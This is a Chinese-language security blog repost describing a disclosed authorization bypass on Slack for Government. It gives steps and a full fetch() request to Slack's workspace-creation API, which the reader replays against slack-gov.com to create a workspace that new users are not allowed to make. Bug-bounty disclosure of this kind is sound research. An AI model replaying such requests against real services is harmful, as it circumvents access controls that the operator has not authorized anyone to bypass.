2026-03-26 12:52:09 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文介绍了在SlackforGovernment（slack-gov.com）平台上发现的一个业务逻辑权限绕过漏洞。攻击者可以通过登录slack-gov.com后，使用浏览器开发者工具发送一个特制的fetch请求，即可成功创建一个GovSlackWorkspace。而根据官方规则，该站点是不允许新用户自行创建工作区的。这一行为的本质是绕过了前端的限制检查，直接调用了后端的创建接口。 综合评分： 85 文章分类： 漏洞分析,WEB安全,渗透测试,红队

cover_image

业务逻辑中存在的权限绕过

原创

h1 h1

迪哥讲事

2026年3月23日 10:01 四川

正文

复现步骤

访问 slack.com（我使用 Firefox）：

1.使用一个从未使用过 Slack 的用户账号登录

2.创建一个 workspace

3.在浏览器开发者工具中复制该请求的 payload（Copy as fetch）

示例请求：

await fetch("https://slack.com/api/signup.createTeam?_x_id=noversion-1667355054.372", {
&nbsp; &nbsp;&nbsp;"credentials":&nbsp;"include",
&nbsp; &nbsp;&nbsp;"headers": {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"User-Agent":&nbsp;"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0",
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Accept":&nbsp;"*/*",
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Accept-Language":&nbsp;"en-US,en;q=0.5",
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Content-Type":&nbsp;"multipart/form-data; boundary=---------------------------34111059701841183173198228768",
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Sec-Fetch-Dest":&nbsp;"empty",
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Sec-Fetch-Mode":&nbsp;"cors",
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Sec-Fetch-Site":&nbsp;"same-origin"
&nbsp; &nbsp; },
&nbsp; &nbsp;&nbsp;"referrer":&nbsp;"https://slack.com/get-started",
&nbsp; &nbsp;&nbsp;"body":&nbsp;"-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"email_misc\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"tz\"\r\n\r\nAmerica/Los_Angeles\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"locale\"\r\n\r\nen-US\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"last_tos_acknowledged\"\r\n\r\ntos_mar2018\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"login\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"in_setup_experiment\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768--\r\n",
&nbsp; &nbsp;&nbsp;"method":&nbsp;"POST",
&nbsp; &nbsp;&nbsp;"mode":&nbsp;"cors"
});

然后：

1.登录 slack-gov.com

2.该站点不允许新用户创建 workspace

3.发送同样的 fetch 请求

4.将域名 slack.com 改为 slack-gov.com

结果：

成功创建 GovSlack Workspace，例如：

viomck.slack-gov.com

如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

一款bp神器

挖掘有回显ssrf的隐藏payload

ssrf绕过新思路

一个辅助测试ssrf的工具

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1758174

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：迪哥讲事 h1 h1《业务逻辑中存在的权限绕过》